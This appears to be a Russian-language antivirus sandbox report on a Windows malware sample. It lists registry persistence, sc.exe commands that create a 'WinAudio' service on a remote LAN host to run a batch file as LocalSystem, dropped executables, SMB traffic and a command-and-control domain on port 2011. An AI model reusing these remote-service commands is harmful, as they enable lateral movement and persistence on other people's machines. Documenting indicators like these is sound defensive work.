Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\WinAudio] 'Start' = '00000002'
- <SYSTEM32>\rundll32.exe 107.URL main
- <SYSTEM32>\sc.exe \\10.0.1.2 config "WinAudio" binpath= "cmd.exe /c "%PROGRAM_FILES%\%PROGR~1\Cest.bat"" start= auto type= interact type= own obj= localsystem password= ""
- <SYSTEM32>\sc.exe \\10.0.1.2 create "WinAudio" binpath= "cmd.exe /c "%PROGRAM_FILES%\%PROGR~1\Cest.bat"" start= auto type= interact type= own displayname= "WinAudio"
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen "%TEMP%\848ZMA9Q77GEL_4N)XJYCA3.jpg"
- <SYSTEM32>\cmd.exe /c ""%PROGRAM_FILES%\%Program Files%\Dest.bat""
- %PROGRAM_FILES%\%Program Files%\107.URL
- %PROGRAM_FILES%\%Program Files%\105.URL
- %PROGRAM_FILES%\%Program Files%\Dest.BAt
- \Device\LanmanRedirector\10.0.1.2\pipe\svcctl
- %PROGRAM_FILES%\%Program Files%\~
- %TEMP%\0yo.exe
- %TEMP%\848ZMA9Q77GEL_4N)XJYCA3.jpg
- C:\ntldr.SYS
- %PROGRAM_FILES%\%Program Files%\Cest.bat
- %PROGRAM_FILES%\%Program Files%\laass.exe
- %TEMP%\0yo.exe
- C:\ntldr.SYS
- 'cx#####012286.3322.org':2011
- '<IP-адрес в локальной сети>':445
- DNS ASK cx#####012286.3322.org
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''